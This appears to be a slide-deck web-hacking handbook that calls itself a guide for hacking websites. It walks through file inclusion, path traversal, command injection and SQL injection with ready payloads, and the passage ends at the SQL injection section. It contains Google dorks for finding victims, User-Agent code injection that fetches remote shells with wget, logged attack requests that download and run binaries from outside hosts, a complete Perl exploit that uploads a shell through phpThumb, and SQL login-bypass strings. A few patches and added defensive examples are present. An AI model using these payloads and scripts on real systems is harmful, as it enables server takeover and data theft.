Web-servers & Application Hacking

raghavbisht9 22,880 views 190 slides Dec 22, 2014

About This Presentation

This document contains various methods to hack or pentest web servers and web applications.

1. A person can use it as a handbook for hacking websites.
2. All contents of this handbook were searched for and taken from various other websites & blogs...
3. Use this knowledge for education purpo...



2014
Root
Root-X Security
1/1/2014
Web Servers & Application Hacking

Part 1
Web-hacking Attacks
This is a tutorial about web-hacking methods that I and many other hackers have collected.
I thought that many people would learn a lot from this here.
Guide content :
• Remote file inclusion
• Local file inclusion
• LFI 2 RCE
• LFI 2 RCE using Firefox
• Local file download
• Full path disclosure
• Command injection vulnerability exploit
• SQL injection - with load file
• MSSQL injection
• Blind SQL injection
• PostgreSQL injection
• Error-based PostgreSQL injection
• SQL injection on ASPX
• DotNetNuke
• XSS
• CRLF
• CSRF
• Server Side Includes | Server Side Inclusion
• Symlink attack
• SQL injection, string & union based
• XPath injection
• LDAP injection
• DNS zone transfer vulnerability exploit
• Oracle padding attack using Burp Suite

So let’s get started !
Remote file inclusion :
1) RFI
RFI (Remote File Inclusion) is a type of web attack. It occurs when a PHP script uses include() to include a file whose name comes from a GET parameter. That file is usually a page in txt format whose content is then printed.
Example:
Code:
http://www.site.com/index.php?page=home

Nowadays RFI is rarely found, and all you need to use it on a vulnerable site is a shell in txt format.

2) Vulnerable script
Code:
<?php
$page = $_GET['page'];
include($page);
?>

3) Exploiting vulnerability
We have the site:
Code:
http://www.site.com/index.php?page=home

Now instead of home we use our shell.
So we get:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?

If the site is vulnerable it shows the shell with a list of files from the site you are attacking.

4) Null byte bypass
In some scripts there is a weak protection that includes the file after appending an html (or other) extension:
Code:
<?php
$page = $_GET['page'];
include($page.".html");
?>

In that case we use the null byte bypass (%00).
Everything after %00 is ignored. %00 is also used for picture upload bypass as php, but I am not going to talk about that here.

So the link should look like this:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00

5) Protection script
The script looks like this:
Code:
<?php
$page = $_GET['page'];
include($page);
?>

So we add a check to protect it:
Code:
<?php
$page = $_GET['page'];
// Only include the file if it exists inside the pages/ directory.
if(file_exists("pages/".$page)) {
include("pages/".$page);
}
?>

Local file inclusion :
1) LFI?
LFI can be used on sites like:
Code:
http://link.com/index.php?page=

by adding
Code:
../../../../../../etc/passwd
(sometimes you have to add %00 after passwd).

2) Finding vulnerable sites:
Code:
index.php?page=
index.php?option=
search.php?word=

3) Checking site vulnerability:
Find a site and use
Code:
../../../../../../../../../../../etc/passwd
or
Code:
../../../../../../../../../../../etc/passwd%00

When you add this to the link you get this:
Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
ntp:x:103:106::/home/ntp:/bin/false
snmp:x:104:65534::/var/lib/snmp:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
which means that the site is vulnerable.

4) /proc/self/environ

Now we want to see whether we can reach /proc/self/environ through the site, so we can upload a shell on it.

Instead of etc/passwd%00 we put /proc/self/environ

If the page prints this:
Code:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Serv..........

then /proc/self/environ is readable, so we can upload the shell.

5) Shell uploading

To upload the shell we need Mozilla Firefox:
Code:
http://www.mozilla.com/firefox/

and the add-on Tamper Data:
Code:
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Open the site, e.g.:
Code:
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ

Tools > Tamper Data
Click Start Tamper, then refresh the page and put the following code in the User-Agent header:
Code:
<?system('wget www.link.com/shell.txt -O shell.php');?>

Click OK. To access the shell use:
Code:
www.link.com/shell.php

LFI 2 RCE
• Find an LFI vulnerable site.

• Check its link.

• Do ->
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ


• Open a command prompt and run the script LFI2RCE.exe [C:\lfi2rce.exe "<website vuln link>"]

• Type command: id
• Type command: uname -a
• Type command: ls -l


• Now upload a "shell" to this web server, so:
• Type command: wget http://downloading-link-of-shell.com/c99.php or /c99.zip
• Type command: unzip c99.txt.zip
• Type command: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (assuming "out14ws.php" is a public HTML page; the move command copies the c99.txt text into "opt14ws.php")
• Type command: ls | grep Out14ws "OR" ls | grep c99
• Type command: pwd [to check the present working directory of the shell]
• Then open the full link of your shell in your web browser; you get:
http://website-name/path/path/c99.php
http://website-name/path/path/opt14ws.php.php

LFI 2 RCE Using Firefox
• Check whether the target is vulnerable to LFI or not
• E.g. http://www.site.com/index.php?page=../../../../../../../../etc/passwd or
http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00


• Now see:
http://www.site.com/index.php?page=../../../../../../proc/self/environ or
http://www.site.com/index.php?page=../../../../../../proc/self/environ%00

• Now in the Firefox address bar type: " about:config "


• Find accessibility.browsewithcaret > right-click > New > String



• NEW STRING VALUE: general.useragent.override
Press " OK "; a new box pops up asking for: ENTER STRING VALUE

• ENTER STRING VALUE: <?php phpinfo(); ?>
This is general.useragent.override


After that you will see something like:

• Now check the PHP version and information while refreshing the vulnerable link or page.
Find the disabled functions: disable_functions - system, passthru, shell_exec, popen,
escapeshellcmd, proc_open etc...



• Once you have checked the phpinfo output, go to the " about:config " page, find
"general.useragent.override" and ENTER STRING VALUE:
• <pre><?php exec('YOUR COMMAND',$result);foreach($result as $output){print "$output\n";}?></pre>
• In place of YOUR COMMAND type a command such as ls -a, uname -a, cd /etc/passwd, pwd, etc...
• For uploading a shell you can type the command: wget http://www.site.com/c99.php

Note: after entering a command you have to refresh the page or vulnerable link to get its output.

• Command: ls -la



• Output: on refreshing the page

• Command: uname -a
Local file download :

1) LFD?
LFD (Local File Download) is a vulnerability in a script used to download files via the GET method, but you can also use it with the POST method using the add-on Tamper Data.
Code:
http://site.com/download_file.php?file=notepad.exe

2) Vulnerable script
Code:
<?php
if(isset($_POST['download'])) {
// The file name comes straight from the request and is never checked.
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>

3) Vulnerability check

To check whether the script is vulnerable we try to download etc/passwd.
So instead of:
Code:
http://site.com/download_file.php?file=notepad.exe

we use:
Code:
http://site.com/download_file.php?file=../../../../../../../../../etc/passwd

If it starts to download and the file, opened in a text editor, looks something like this:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin

the script is vulnerable!
NOTE: If it is a Windows server use boot.ini instead of etc/passwd.

4) Exploiting vulnerability

Now that we know the script is vulnerable, we want to see which files are on the host. You can do this like so:
Code:
http://site.com/download_file.php?file=../

../ takes us one directory back and downloads the file.

1.1 It is possible that it downloads a file which, opened in a text editor, lists the files in the directories.
1.2 Or it is possible that it downloads a file, but when opened in a text editor the file is empty.

In case 1.1 we don't have to guess file names and directories and can download whatever we want.
In case 1.2 we must guess file names and directories and can only download files whose names we guess. There are a few programs that can help us find files (Acunetix and HTTrack Website Copier).

5) Protection script

We have the script mentioned at the start:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>

By adding if(file_exists("download/".$file)) we secure the script.
So it should look like:
Code:
<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
// Only serve the file if it exists inside the download/ directory.
if(file_exists("download/".$file)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize("download/".$file));
readfile("download/".$file);
exit;
}
}
?>
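An added example, not the tutorial's own code, that serves both the RFI protection script (section 5 of Remote file inclusion) and the LFD protection script just above: file_exists("pages/".$page) and file_exists("download/".$file) still accept ../ sequences, because a path such as download/../../../etc/passwd does exist. The check below resolves the path with realpath() and requires the result to stay under the base directory; the pages/ and download/ directory names, the page allowlist and the helper names are assumptions for the example.

```php
<?php
// Added example, not the tutorial's own code: one realpath()-based
// containment check for both index.php?page= and download_file.php?file=.
// Directory names (pages/, download/) and the page allowlist are assumed.
declare(strict_types=1);

// Return the canonical path of $userPath inside $baseDir, or null if it
// contains a NUL byte (%00), does not exist, or resolves outside $baseDir.
function safe_local_path(string $baseDir, string $userPath): ?string
{
    if (strpos($userPath, "\0") !== false) {
        return null;                     // the %00 truncation trick
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ../ and symlinks; it returns false for missing
    // files and for remote URLs, which are not filesystem paths at all.
    $real = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment: the resolved path must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// index.php?page=home: an allowlist of page names is simpler and stricter
// than any path check, because nothing the user sends is used as a path.
function include_page(string $page): bool
{
    $allowed = ['home', 'about', 'contact'];   // assumed page names
    if (!in_array($page, $allowed, true)) {
        return false;
    }
    include __DIR__ . '/pages/' . $page . '.php';
    return true;
}

// download_file.php?file=notepad.exe: serve only files resolved under
// download/, and build the headers from the resolved path, not the input.
function send_download(string $file): bool
{
    $path = safe_local_path(__DIR__ . '/download', $file);
    if ($path === null) {
        return false;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
    return true;
}

// Self-check against a constructed temporary tree (not a real site).
$tmp = sys_get_temp_dir() . '/lfd_' . bin2hex(random_bytes(4));
mkdir($tmp . '/download', 0700, true);
file_put_contents($tmp . '/download/notepad.exe', 'demo');
$cases = [
    'notepad.exe',                          // legitimate request
    '../../../../../../../../etc/passwd',   // traversal from the tutorial
    "notepad.exe\0.jpg",                    // decoded %00
    'http://www.shell-link.com/shell.txt',  // remote path
];
foreach ($cases as $c) {
    $r = safe_local_path($tmp . '/download', $c);
    printf("%-40s => %s\n", addcslashes($c, "\0"), $r === null ? 'rejected' : 'serve ' . $r);
}
unlink($tmp . '/download/notepad.exe');
rmdir($tmp . '/download');
rmdir($tmp);
```

Only the first case is served; the traversal string resolves to /etc/passwd, which fails the prefix check even though the file exists.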

Full path disclosure :

This method uses errors in a file, or errors made by programmers, to let you see which files are in which directories. You can't directly hack a site with it; it only helps you while hacking.

It is useful because it makes hacking faster and easier, and it also helps with Local File Inclusion (LFI) when a folder name or some other file has been changed. You can find that out using FPD.

There are a lot of ways to use an FPD vulnerability on a site; I'll explain the 2 most important.

The 1st is via an array, by adding square brackets to a link like this one:
Code:
index.php?page=home

To trigger the vulnerability, add [] in the right place:
Code:
index.php?page[]=home

That will give you an error like this:
Code:
Warning: include(blah/errors.php) [function.include]: failed to open stream:
No such file or directory /home/insekure/public_html/index.php on line 211

From this you can see whether the directory blah exists on the site.

The 2nd method is to add the most common cookie (a null session cookie); you can set it with a JavaScript injection. By running JavaScript on the site you get an error.

This is the JavaScript code:
Code:
javascript:void(document.cookie='PHPSESSID=');

Add that in your address bar and hit enter; when the page is refreshed you get this error:
Code:
Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
/home/example/public_html/thems/errors.php on line 58

Then try to open the directory thems on the site; that should list the files in that directory.

Protection:
The simplest way to protect against these attacks is to turn off error reporting.
Edit or add:
Code:
error_reporting(0);

Command Injection Vulnerability Exploit

• phpThumb() "fltr[]" Command Injection Vulnerability Exploit Scans
• Automatic Shell Upload
I. phpThumb() "fltr[]" Command Injection Vulnerability

Since the 21st of December 2011 we've identified over 300 attempts to exploit the phpThumb() 'fltr[]' Parameter Command Injection Vulnerability, aka CVE-2010-1598, reported back in April 2010. Input passed via the "fltr[]" parameter to phpThumb.php is not properly sanitized before being used in a command line argument.
This can be exploited to inject and execute arbitrary shell commands via specially crafted requests.
Successful exploitation requires that "ImageMagick" is installed.
The vulnerability is confirmed in version 1.7.9. Other versions may also be affected. This vulnerability can be exploited with "high_security_enabled" set to "true" by brute forcing the "high_security_password".
Source: phpThumb() "fltr[]" Command Injection Vulnerability
By appending a semi-colon to the "blur" option of the fltr parameter, the attacker is able to execute OS level commands, as there aren't any input validation checks on the $command data in phpthumb.functions.php.
function ImageMagickThumbnailToGD() {
...
foreach ($this->fltr as $filterkey => $filtercommand) {
@list($command, $parameter) = explode('|', $filtercommand, 2);
switch ($command) {
...
case 'blur':
if ($this->ImageMagickSwitchAvailable('blur')) {
@list($radius) = explode('|', $parameter);
$radius = ($radius ? $radius : 1);
$commandline .= ' -blur '.$radius;
unset($this->fltr[$filterkey]);
}
break;

...
$this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__);
$IMresult = phpthumb_functions::SafeExec($commandline);
clearstatcache();
if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {
@unlink($IMtempSourceFilename);
}
if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {
$this->FatalError('ImageMagick failed with message ('.trim($IMresult).')');
$this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__);
...
}
The issue was first addressed in version 1.7.10 and in version 1.7.11 the author added even more explicit
escaping of command line parameters according to the changelog.


escapeshellarg
The updated code uses the php escapeshellarg function and also limits the length of the input.
case 'blur':
if ($this->ImageMagickSwitchAvailable('blur')) {
@list($radius) = explode('|', $parameter);
$radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1);
$commandline .= ' -blur '.escapeshellarg($radius);
$successfullyProcessedFilters[] = $filterkey;
}
break;
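An added example, not phpThumb's own code: the 'blur' branch reduced to two functions that only build the -blur argument, one in the 1.7.9 shape quoted above and one in the 1.7.11 shape with the integer clamp and escapeshellarg(). Both are run on a benign filter and on the fltr[] value that appears in the scan requests later in this section; nothing is executed, the point is what the shell would receive. has_shell_metachars() is a hypothetical helper for the example.

```php
<?php
// Added example, not phpThumb's code: the 'blur' branch of the fltr[] loop
// reduced to two functions that only build the ImageMagick argument.
declare(strict_types=1);

// 1.7.9 shape: the radius is taken verbatim and concatenated unescaped.
function blur_arg_unsafe(string $filtercommand): string
{
    @list($command, $parameter) = explode('|', $filtercommand, 2);
    if ($command !== 'blur') {
        return '';
    }
    @list($radius) = explode('|', (string) $parameter);
    $radius = ($radius ? $radius : 1);
    return ' -blur ' . $radius;
}

// 1.7.11 shape: clamp to an integer in 0..25, then escapeshellarg().
// intval() stops at the first non-digit, so "9 -quality ... ; ls" becomes 9.
function blur_arg_fixed(string $filtercommand): string
{
    @list($command, $parameter) = explode('|', $filtercommand, 2);
    if ($command !== 'blur') {
        return '';
    }
    @list($radius) = explode('|', (string) $parameter);
    $radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1);
    return ' -blur ' . escapeshellarg((string) $radius);
}

// Hypothetical regression check (not in phpThumb): does the argument carry
// characters that would make the shell see a second command?
function has_shell_metachars(string $arg): bool
{
    return preg_match('/[;&|`$<>\n]/', $arg) === 1;
}

$filters = [
    'blur|5',                                                                 // normal use
    'blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp', // fltr[] value seen in the scans
];
foreach ($filters as $f) {
    $unsafe = blur_arg_unsafe($f);
    $fixed  = blur_arg_fixed($f);
    printf("fltr[]=%s\n", $f);
    printf("  1.7.9:  %s  [metachars: %s]\n", $unsafe, has_shell_metachars($unsafe) ? 'yes' : 'no');
    printf("  1.7.11: %s  [metachars: %s]\n", $fixed, has_shell_metachars($fixed) ? 'yes' : 'no');
}
```

For the scan value the 1.7.9 form passes the whole string, semicolon included, through to the command line, while the 1.7.11 form reduces it to the quoted integer '9'.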
The problem with these extensions is that they use dangerous PHP functions which have the potential to
mess up a web hosting server and hack / exploit user accounts further up to root level.

Hackers, who use an insecure PHP script as an entry point to a web hosting server, can start unleashing
dangerous commands and take control over the complete server quickly.
Certain functions used in such scripts are considered dangerous and are turned off in the PHP configuration by responsible web hosts.
(Un)fortunately escapeshellarg is often part of the disabled functions so either way you can’t win except
by staying away from scripts that use these dangerous functions.
Find the location of your php.ini file. Open that file and look for "disable_functions" and replace it with
the following line:

disable_functions =
exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close,
proc_open,ini_alter,dl,popen,parse_ini_file,show_source,curl_exec
Source: Disabling dangerous PHP functions
3.5 php.ini & disabled functions

safe_mode = On
expose_php = Off
Enable_dl= Off
magic_quotes = On
register_globals = off
display errors = off
disable_functions = system, show_source, symlink, exec, dl,shell_exec, passthru, phpinfo,
escapeshellarg,escapeshellcmd
Source: How To: WHM/cPanel Hardening & Security - The Basics - Part 1


Exploit Scans
The queries are as follows:
GET /phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1
GET /manager/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9 HTTP/1.1
Breakdown of the requests / commands:
Exploit the vulnerability in the phpThumb.php fltr[] parameter.

GET /admin/upload/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;


Display all information about files / directories - shows long listing information about the file / directory.
ls -l /tmp;


Download file barbut6 from bingoooo.co.uk and write output to file /tmp/barbut6.
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;


Usually default permissions are set to 0644, change file permission to 0755 for owner / group / others so
that the file can be executed.
chmod 0755 /tmp/barbut6;



Run / Execute file barbut6.
/tmp/barbut6;


The ps command gives a snapshot of the current processes.
On most systems derived from BSD, ps commonly runs with the non-standard options aux, where "a" lists all processes on a terminal, including those of other users, "x" lists all processes without controlling terminals and "u" adds a column for the controlling user for each process. Note that, for maximum compatibility when using this syntax, there is no "-" in front of the "aux".
ps -aux;

Send SIGKILL to all perl processes. SIGKILL (signal number 9) is a forced shutdown of a process. Note that with SIGKILL the process will not have the opportunity to clean up any system resources it was using (e.g. temporary files etc.).
killall -9 perl;


Start perl and run / execute file f.
perl /tmp/f;


The output will be kept in the picture debug, created through the parameter phpThumbDebug = 9.
&phpThumbDebug=9



IP List

List of IPs involved in the scans:
65.23.154.56 | 77.93.216.38 | 87.98.219.50 | 91.121.100.30 | 91.121.105.174 | 91.121.154.199 | 94.23.51.208 | 200.155.17.68


Targets
GET /cms/plugins/content/jthumbs/includes/phpThumb.php
GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php
GET /common/scripts/phpThumb/phpThumb.php
GET /phpThumb/phpThumb.php
GET /libs/phpThumb/phpThumb.php
GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php
GET /gallery/phpThumb/phpThumb.php
GET /wp-content/themes/victore/phpthumb/phpThumb.php
GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php
GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php
GET /js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /mambots/editors/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /modules/phpThumb/phpThumb.php
GET /lib/phpThumb/phpThumb.php
GET /manager/phpThumb/phpThumb.php
GET /thumb/phpThumb.php
GET /global/phpthumb/phpThumb.php
GET /components/com_hotornot2/phpthumb/phpThumb.php
GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php
GET /wp-content/themes/redcarpet/scripts/phpthumb/phpthumb.php
GET /staticfiles/phpThumb/phpThumb.php
GET /content/phpthumb/phpthumb.php
GET /class/phpthumb/phpThumb.php
GET /admin/phpThumb/phpThumb.php
GET /phpThumb.php
GET /admin/upload/phpThumb.php
GET /assets/components/phpthumb/phpThumb.php
GET /components/com_alphacontent/assets/phpthumb/phpThumb.php
GET /components/com_hotornot2/phpthumb/phpThumb.php
GET /components/com_alphauserpoints/assets/phpThumb/phpThumb.php
GET /admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php
GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php
GET /components/com_flexicontent/librairies/phpthumb/phpThumb.php
GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php


II. Automatic Shell Upload Perl Script
Note: Please change the c991.txt address to your own shell address.

#!/usr/bin/perl
# Exploit Title: phpThumb v. <= 1.7.9 Remote Command Injection (Automatic Shell Upload)
# Date: 09/09/2013
# Author: D35m0nd142
# Vendor Homepage: http://phpthumb.sourceforge.net/
# Tested on: phpThumb 1.7.9
# Enter the website in this form --> http://mobileworld24.pl/wpcontent/themes/mobileworld24/inc/phpThumb/
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit \n";
print " (Automatic Shell Upload) \n";
print " created by D35m0nd142 \n";

print "======================================================\n";
sleep(0.8);
print "Usage: perl phpthumb.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: 'http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
#sleep(1);
print "====================================================== \n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit \n";
print " (Automatic Shell Upload) \n";
print " created by D35m0nd142 \n";
print "======================================================\n";
sleep(1.1);
print "[*] Sending exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1');
#print "Enter the command to execute => ";
#$cmd = <STDIN>;
$website = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; wget kratos91.altervista.org/c991.txt -O c991.txt ; &phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));

if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~ /Saving to: / ))
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}

else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}

print "[*] Controlling if the txt shell has been uploaded ...\n";
sleep(1.2);
$cwebsite = "$target/c991.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ ))
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format ... wait please ... \n";
sleep(1.1);
$mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; mv c991.txt shell.php ; &phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite = "$target/shell.php";

$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success && ($c2req->content =~ "/<b>Command execute<\/b><\/a> ::<\/b><\/p><\/td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req->content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ ))
{
print "[+] PHP Shell injected => '$cwebsite' :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from Txt to Php :( \n";
exit(1);
}
}

else
{
print "[-] Txt shell not uploaded. :( \n";
}

MYSQL Injection :

1) Dorks
Code:
inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp

I am going to use:
Code:
http://site.com/Admin_Login.asp

2) Logging in

Now you can find a site using these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--

Instead of password' or 1=1 you can use one of these:
Code:
'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'

password' or 1=1 confuses the server's query and lets you log in.
So if you are able to log in, the site is vulnerable and you can use the admin panel.

SQL Injection :

1) SQL Injection?
SQL Injection is a type of web attack. The attacker uses a hole in a script to take all data from the database.
Vulnerable sites are in the format:
Code:
http://www.link.com/index.php?id=

There can be anything else instead of index.

2) Finding vulnerable sites:
The best way to find vulnerable sites is Google. We use these dorks to find sites:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check:
There are 2 ways to check whether a site is vulnerable.

1st way, we have the link:
Code:
http://site.com/book.php?id=141

we add only ' at the end of the link so we get:
Code:
http://site.com/book.php?id=141'

2nd way, we have the link:
Code:
http://site.com/book.php?id=141

we add +and+1=2-- at the end of the link so we get:
Code:
http://site.com/book.php?id=141+and+1=2--

If some part of the page disappears (picture, text or something) or an error such as (You have an error in your SQL syntax) appears, the site is vulnerable.

4) Finding number of columns
We can do it with order by, on the link:
Code:
http://site.com/book.php?id=141

adding +order+by+5--
Code:
http://site.com/book.php?id=141+order+by+5--

If the page opens normally there are more than 5 columns. Let's try 10.
Code:
http://site.com/book.php?id=141+order+by+10--

Now some part of the site disappeared, which means there are more than 5 and fewer than 10 columns. Let's try 7.
Code:
http://site.com/book.php?id=141+order+by+7--

The page opens normally, which means there are more than 7 and fewer than 10 columns. Let's try 8.
Code:
http://site.com/book.php?id=141+order+by+8--

At column 8 part of the site disappears, which means there are 7 columns.

5) Finding vulnerable columns

Finding vulnerable columns is done with union select all; on the link (in this case) we add +union+select+all+1,2,3,4,5,6,7--
Code:
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--

It prints numbers on the page (in this case 1 2 3 4 5 6 7), which means that data can be taken from any column. We are going to take it from the second column.

6) Finding database version

As I said, we take data from the second column. Instead of number 2 we put version() or @@version
Code:
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--

On the page where number 2 was, it shows the database version.
If the database version is 4 we have to guess the names of the table and column, but if the database version is 5 we don't have to guess them.

We have version 5.0.51a-24+lenny5, which means that we don't have to guess the names of the table and column.

7) Finding table names

